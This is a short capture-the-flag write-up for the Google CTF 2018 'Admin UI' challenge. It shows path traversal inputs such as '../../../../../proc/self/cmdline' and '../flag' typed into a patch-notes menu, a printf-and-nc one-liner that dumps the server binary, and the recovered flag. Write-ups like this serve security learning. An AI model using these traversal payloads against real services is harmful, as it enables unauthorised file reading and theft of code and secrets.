When we examine patchnotes we can find out that although path traversal
vulnerability was patched in v0.2 it was rolled back in v0.3.  
Let's try it  
```  
=== Management Interface ===  
1) Service access  
2) Read EULA/patch notes  
3) Quit  
2  
The following patchnotes were found:  
\- Version0.3  
\- Version0.2  
Which patchnotes should be shown?  
../../../../../proc/self/cmdline  
./main  
```  
So our binary is named `main`. Hopefully we can just print its contents the
same way.  
```  
=== Management Interface ===  
1) Service access  
2) Read EULA/patch notes  
3) Quit  
2  
The following patchnotes were found:  
\- Version0.3  
\- Version0.2  
Which patchnotes should be shown?  
../main  
```  
We have to redirect output to file and then remove additional data added by
this application (menu etc.)  
```  
printf "2\n../main\n3\n" | nc mngmnt-iface.ctfcompetition.com 1337 > output.bin  
```  
(open output.bin in any notepad or hexeditor and remove everything before
\x7fELF and after the last series of null bytes at the end)

This way we got the copy of the binary running on the server.  
When we open it in IDA we can see that the application reads the password from
file `flag`. Let's cat it.  
```  
=== Management Interface ===  
1) Service access  
2) Read EULA/patch notes  
3) Quit  
2  
The following patchnotes were found:  
\- Version0.3  
\- Version0.2  
Which patchnotes should be shown?  
../flag  
CTF{I_luv_buggy_sOFtware}  
```  
Flag: `CTF{I_luv_buggy_sOFtware}`

Original writeup (https://github.com/BOAKGP/CTF-
Writeups/tree/master/Google%20CTF%202018%20Quals%20Beginners%20Quest/Admin%20UI#admin-
ui).